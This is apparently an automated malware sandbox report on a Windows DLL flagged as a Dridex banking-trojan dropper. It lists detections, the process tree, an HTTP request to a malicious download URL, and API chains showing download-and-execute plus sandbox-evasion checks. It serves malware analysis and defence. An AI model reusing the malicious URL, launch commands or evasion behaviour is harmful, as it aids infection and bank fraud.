Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
e.dll

Overview

General Information

Sample name:e.dll
Analysis ID:1519390
MD5:972d3e17b96745be89b80ec5d8f4f9d3
SHA1:e97c6461bbdcd91566f4cb75b456e399b7fe06c2
SHA256:b116511e3960ab5fa53ad6a3243240be11235ebdc323705827713cf12a9aeeda
Infos:

Detection

Dridex Dropper
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Dridex dropper found
System process connects to network (likely due to code injection or exploit)
Machine Learning detection for sample
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found decision node followed by non-executed suspicious APIs
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • loaddll32.exe (PID: 6920 cmdline: loaddll32.exe "C:\Users\user\Desktop\e.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4516 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\e.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 916 cmdline: rundll32.exe "C:\Users\user\Desktop\e.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: e.dllAvira: detected
Antivirus detection for URL or domain
Source: https://w0t.lol/u1AnNcgaAe2bF5Pgk9d0LeWL8vpSDZkJZinYdkhr9pqBGLRnRX5Vvq3izq9ug8qLY6yKal3j6Ee_t1iMTK_cAvira URL Cloud: Label: malware
Source: https://w0t.lol/Avira URL Cloud: Label: malware
Source: https://w0t.lol/u1AnNcgaAe2bF5Pgk9d0LeWL8vpSDZkJZinYdkhr9pqBGLRnRX5Vvq3izq9ug8qLY6yKal3j6Ee_t1iMTK_cFx1mTVmw7UgAUUyYrKRm3RdsqVNvpv6_kKFgqugw7GxorO8WhL4PsC4qoVKtjEe0DOKO8ZDw1Tjmp1kilcdzr5ins6cIF1bcVHlXvd0LhB36FiVt_ML5BynNwrbTMXHBlrYMYDHKv7fr-4V207YlIg6tWfJiMRdzu_qeSooE4jIQIx6aML1s49f-Ri0B1CS37y5JuxrX5yqAG8oDK4QDEBXT7TWGpGoNsuTFyKiEDbJQD0BBibjsRhVHiSSidzARVzTSro8qK1SpnxWQFVotTjKG7CepcMDibvLwH_Jr5CkuCYLKtK52-cvQybIZ4Fhw0wjCJODhJJbW1bSQqThISFsFSjkb8WhpxT9Aqfic0XAAvira URL Cloud: Label: malware
Machine Learning detection for sample
Source: e.dllJoe Sandbox ML: detected
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_27AC1120 GetTickCount,SHGetValueA,SHSetValueA,UuidCreateSequential,sprintf,RtlComputeCrc32,GlobalAlloc,sprintf,RtlComputeCrc32,sprintf,RtlComputeCrc32,sprintf,GetModuleFileNameA,sprintf,GetCommandLineA,sprintf,memset,CryptBinaryToStringA,sprintf,memset,EnumDisplaySettingsA,sprintf,memcpy,memcpy,memset,GlobalFree,CryptAcquireContextA,CryptDecodeObjectEx,CryptImportPublicKeyInfo,CryptEncrypt,CryptBinaryToStringA,memset,GlobalFree,URLDownloadToCacheFileA,lstrlen,memset,GlobalFree,_lopen,_hread,_lclose,WinExec,GlobalFree,3_2_27AC1120
Source: e.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: unknownHTTPS traffic detected: 104.21.69.9:443 -> 192.168.11.20:49757 version: TLS 1.2
Source: Binary string: a:\s7i.pdbL source: e.dll
Source: Binary string: a:\s7i.pdb source: loaddll32.exe, 00000000.00000002.27456647904.0000000000C5F000.00000002.00000001.01000000.00000003.sdmp, e.dll
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06622A81 FindFirstFileW,3_3_06622A81

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 104.21.69.9 443Jump to behavior
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /u1AnNcgaAe2bF5Pgk9d0LeWL8vpSDZkJZinYdkhr9pqBGLRnRX5Vvq3izq9ug8qLY6yKal3j6Ee_t1iMTK_cFx1mTVmw7UgAUUyYrKRm3RdsqVNvpv6_kKFgqugw7GxorO8WhL4PsC4qoVKtjEe0DOKO8ZDw1Tjmp1kilcdzr5ins6cIF1bcVHlXvd0LhB36FiVt_ML5BynNwrbTMXHBlrYMYDHKv7fr-4V207YlIg6tWfJiMRdzu_qeSooE4jIQIx6aML1s49f-Ri0B1CS37y5JuxrX5yqAG8oDK4QDEBXT7TWGpGoNsuTFyKiEDbJQD0BBibjsRhVHiSSidzARVzTSro8qK1SpnxWQFVotTjKG7CepcMDibvLwH_Jr5CkuCYLKtK52-cvQybIZ4Fhw0wjCJODhJJbW1bSQqThISFsFSjkb8WhpxT9Aqfic0XA HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: w0t.lolConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_27AC1120 GetTickCount,SHGetValueA,SHSetValueA,UuidCreateSequential,sprintf,RtlComputeCrc32,GlobalAlloc,sprintf,RtlComputeCrc32,sprintf,RtlComputeCrc32,sprintf,GetModuleFileNameA,sprintf,GetCommandLineA,sprintf,memset,CryptBinaryToStringA,sprintf,memset,EnumDisplaySettingsA,sprintf,memcpy,memcpy,memset,GlobalFree,CryptAcquireContextA,CryptDecodeObjectEx,CryptImportPublicKeyInfo,CryptEncrypt,CryptBinaryToStringA,memset,GlobalFree,URLDownloadToCacheFileA,lstrlen,memset,GlobalFree,_lopen,_hread,_lclose,WinExec,GlobalFree,3_2_27AC1120
Source: global trafficHTTP traffic detected: GET /u1AnNcgaAe2bF5Pgk9d0LeWL8vpSDZkJZinYdkhr9pqBGLRnRX5Vvq3izq9ug8qLY6yKal3j6Ee_t1iMTK_cFx1mTVmw7UgAUUyYrKRm3RdsqVNvpv6_kKFgqugw7GxorO8WhL4PsC4qoVKtjEe0DOKO8ZDw1Tjmp1kilcdzr5ins6cIF1bcVHlXvd0LhB36FiVt_ML5BynNwrbTMXHBlrYMYDHKv7fr-4V207YlIg6tWfJiMRdzu_qeSooE4jIQIx6aML1s49f-Ri0B1CS37y5JuxrX5yqAG8oDK4QDEBXT7TWGpGoNsuTFyKiEDbJQD0BBibjsRhVHiSSidzARVzTSro8qK1SpnxWQFVotTjKG7CepcMDibvLwH_Jr5CkuCYLKtK52-cvQybIZ4Fhw0wjCJODhJJbW1bSQqThISFsFSjkb8WhpxT9Aqfic0XA HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: w0t.lolConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: w0t.lol
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 11:12:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateCF-Cache-Status: DYNAMICSpeculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8c92d1d5482d3af0-IAD
Source: rundll32.exe, 00000003.00000003.22959506464.00000000031A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.22960391062.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: rundll32.exe, 00000003.00000003.22959506464.00000000031A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.22960391062.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000003.00000003.22959506464.00000000031A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.22960391062.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: rundll32.exe, 00000003.00000002.22960045348.000000000317F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: rundll32.exe, 00000003.00000003.22959506464.00000000031A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.22960391062.00000000031A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: rundll32.exe, 00000003.00000002.22960045348.000000000317F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://w0t.lol/
Source: rundll32.exe, 00000003.00000002.22960045348.0000000003121000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://w0t.lol/u1AnNcgaAe2bF5Pgk9d0LeWL8vpSDZkJZinYdkhr9pqBGLRnRX5Vvq3izq9ug8qLY6yKal3j6Ee_t1iMTK_c
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownHTTPS traffic detected: 104.21.69.9:443 -> 192.168.11.20:49757 version: TLS 1.2

E-Banking Fraud

barindex
Dridex dropper found
Source: Initial fileSignature Results: Dridex dropper behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 6%
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0660D969 NtQuerySystemInformation,3_3_0660D969
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06606790 NtQueryDirectoryObject,3_3_06606790
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E52084 NtCreateThreadEx,3_2_04E52084
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065FD53D: DeviceIoControl,3_3_065FD53D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_04FDE58D3_3_04FDE58D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_064D112C3_3_064D112C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_064D18AC3_3_064D18AC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_064D5AE03_3_064D5AE0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_064D49DC3_3_064D49DC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_064D2F7C3_3_064D2F7C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_064D371C3_3_064D371C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_064D33343_3_064D3334
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0660CB603_3_0660CB60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_066223603_3_06622360
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06624C603_3_06624C60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0660D9693_3_0660D969
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_066013703_3_06601370
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0660DB703_3_0660DB70
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06627F593_3_06627F59
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_066022203_3_06602220
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_066026253_3_06602625
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0660BB303_3_0660BB30
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0660CD003_3_0660CD00
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06623C003_3_06623C00
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065FD53D3_3_065FD53D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_066102063_3_06610206
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06624F103_3_06624F10
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0660E3E03_3_0660E3E0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0660C5E03_3_0660C5E0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06600EE03_3_06600EE0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065D2BD63_3_065D2BD6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_066089F03_3_066089F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_066252F23_3_066252F2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_066112F03_3_066112F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0660F1F33_3_0660F1F3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0660CFC03_3_0660CFC0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0660A5D63_3_0660A5D6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0660C3A03_3_0660C3A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06608DA03_3_06608DA0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065D12903_3_065D1290
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065FD0903_3_065FD090
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06606CBB3_3_06606CBB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065FD7803_3_065FD780
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06622A813_3_06622A81
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_066067903_3_06606790
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_066027903_3_06602790
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06622C903_3_06622C90
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0660A1603_3_0660A160
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06610C603_3_06610C60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065D33583_3_065D3358
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065D30553_3_065D3055
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065FE4503_3_065FE450
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065FE8503_3_065FE850
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0660DE703_3_0660DE70
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065D2E4E3_3_065D2E4E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_066086403_3_06608640
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0660FB403_3_0660FB40
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_066226403_3_06622640
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065D327A3_3_065D327A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06625F503_3_06625F50
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065D36653_3_065D3665
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065E60143_3_065E6014
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065D36113_3_065D3611
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0660C1303_3_0660C130
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0660FE303_3_0660FE30
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_066278303_3_06627830
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065D31063_3_065D3106
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065D10003_3_065D1000
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_066104003_3_06610400
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_066085103_3_06608510
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06602D103_3_06602D10
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_066111103_3_06611110
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065D30283_3_065D3028
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065D33223_3_065D3322
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065D36DC3_3_065D36DC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_066221E03_3_066221E0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065D33D53_3_065D33D5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065FCDD03_3_065FCDD0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_066255F03_3_066255F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065D32CE3_3_065D32CE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065D30CB3_3_065D30CB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065D2DC03_3_065D2DC0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0660D4C03_3_0660D4C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06611DC03_3_06611DC0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065D2DFE3_3_065D2DFE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0660A7D03_3_0660A7D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_066109D03_3_066109D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065D308E3_3_065D308E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065D408E3_3_065D408E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065D54893_3_065D5489
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065D338A3_3_065D338A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_065D35BB3_3_065D35BB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_066259903_3_06625990
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D316803_2_04D31680
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D322A83_2_04D322A8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D31EAF3_2_04D31EAF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D344583_2_04D34458
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D345E83_2_04D345E8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D340943_2_04D34094
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D316983_2_04D31698
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04D3252C3_2_04D3252C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E571D23_2_04E571D2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E522A03_2_04E522A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E520843_2_04E52084
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E514603_2_04E51460
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E5A6603_2_04E5A660
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E5A9003_2_04E5A900
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E512403_2_04E51240
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04E574103_2_04E57410
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_27AC11203_2_27AC1120
Source: e.dllStatic PE information: Number of sections : 13 > 10
Source: e.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: e.dllStatic PE information: Section: z4g ZLIB complexity 0.9946666190294715
Source: e.dllStatic PE information: Section: qm ZLIB complexity 0.9991314643252213
Source: e.dllStatic PE information: Section: L ZLIB complexity 0.9966262291217672
Source: classification engineClassification label: mal80.bank.evad.winDLL@6/0@1/1
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:304:WilStaging_02
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\e.dll",#1
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\e.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\e.dll",#1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\e.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\e.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\e.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\SecurityJump to behavior
Source: e.dllStatic file information: File size 2228224 > 1048576
Source: e.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: a:\s7i.pdbL source: e.dll
Source: Binary string: a:\s7i.pdb source: loaddll32.exe, 00000000.00000002.27456647904.0000000000C5F000.00000002.00000001.01000000.00000003.sdmp, e.dll
Source: e.dllStatic PE information: section name: .crt1
Source: e.dllStatic PE information: section name: z4g
Source: e.dllStatic PE information: section name: qm
Source: e.dllStatic PE information: section name: L
Source: e.dllStatic PE information: section name: CONST
Source: e.dllStatic PE information: section name: 3
Source: e.dllStatic PE information: section name: buicKDZl
Source: e.dllStatic PE information: section name: CRT
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E5D1F4 push edi; ret 0_2_00E5D1F5
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E599DB pushfd ; iretd 0_2_00E599DC
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E5996B pushfd ; ret 0_2_00E5997B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_04FDD5C8 push ebp; retf 3_3_04FDD5C9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_066225F0 push esi; mov dword ptr [esp], ecx3_3_066225F4
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
